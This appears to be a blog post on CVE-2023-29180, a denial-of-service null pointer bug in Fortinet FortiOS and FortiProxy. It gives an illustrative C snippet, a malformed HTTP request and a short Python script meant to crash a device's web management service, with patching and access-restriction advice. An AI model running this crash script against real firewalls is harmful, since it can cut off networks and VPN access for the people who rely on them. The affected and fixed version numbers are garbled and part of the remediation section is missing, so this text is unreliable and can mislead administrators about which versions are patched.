Fortinet is a well-known vendor when it comes to network security appliances. Their FortiOS is widely deployed in firewalls, VPNs, and other security gateways. However, in early 2023, a vulnerability was discovered that impacted multiple Fortinet products, specifically FortiOS and FortiProxy. This blog post will break down the details of CVE-2023-29180, show how the bug works, and share basic exploitation information in simple terms.
Vulnerability Overview
CVE Identifier: CVE-2023-29180
Issue: Null Pointer Dereference (Denial of Service)
Versions Impacted:
1.. - 1..7
Attack vector: Remote attack via specially crafted HTTP requests.
Impact: Attacker can crash the target device, causing Denial of Service (DoS).
What is a Null Pointer Dereference?
In programming, a *null pointer dereference* happens when a program tries to use a pointer that doesn’t point to anything. In C or C++ (which FortiOS is heavily based on), this often results in a crash. For networking gear like firewalls, this can mean a total service outage until the box is rebooted.
Technical Details
According to the Fortinet Security Advisory, the vulnerability allows a remote attacker to send a malicious HTTP request that causes the software to access a null pointer internally — and thus, crash.
Typical Vulnerable Code Pattern
While the closed-source nature of FortiOS means we don't have the exact code, a simplified example might look like this:
struct http_request *req = parse_http_request(buf);
if (req->headers["Host"] != NULL) {
process_host_header(req->headers["Host"]);
}
// ... later in the code
free_http_request(req);
If parse_http_request fails and returns a null pointer but code forgets to check, then any attempt to access req->headers will dereference a null pointer, bringing the whole process down.
In a Real Device
Attackers discovered that sending malformed or incomplete HTTP requests to the web management interface triggers this bug. This could be as simple as:
GET / HTTP/1.1
Host:
[missing some critical header or formatting]
If the internal parser is not robust against bad input, it can choke and crash, terminating or rebooting the service.
Here's a minimalist exploit in Python, designed for education and testing on lab devices only
import socket
target_host = "firewall.ip.address"
target_port = 80
malformed_request = b"GET / HTTP/1.1\r\nHost:\r\n\r\n"
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((target_host, target_port))
s.sendall(malformed_request)
Warning: Never run this against systems you don't own or have permission to test!
Sending this malformed request enough times can crash the target device, causing management access to go offline or even bringing down the firewall entirely.
Proof of Concept Analysis
Researchers have confirmed that repeatedly sending these malformed HTTP headers causes the device to drop connections or freeze. In some cases, watchdog timers reboot the device, but during the crash, the network traffic is dropped.
Note: This bug is a Denial of Service only. It does NOT enable remote code execution or information theft. However, crashing a firewall is serious: it can cut off remote offices, block VPN services, or create a gap in network security.
FortiProxy: 7.2.4, 7..11, 2..13, 1.2.14, 1.1.7, 1..8 or later
As a quick mitigation, restrict web management (HTTP/HTTPS) access to trusted IPs and always use out-of-band management if possible.
References
- Fortinet PSA - FG-IR-23-056
- NVD entry for CVE-2023-29180
- Exploit discussion on Seclists/Full Disclosure
Conclusion
CVE-2023-29180 is a clear example of why even simple code bugs like null pointer dereference can have a big impact in security appliances. If you use Fortinet devices, *patch as soon as possible*. Don't expose management interfaces to the public web and always test patches before rolling into production.
Timeline
Published on: 02/22/2024 10:15:07 UTC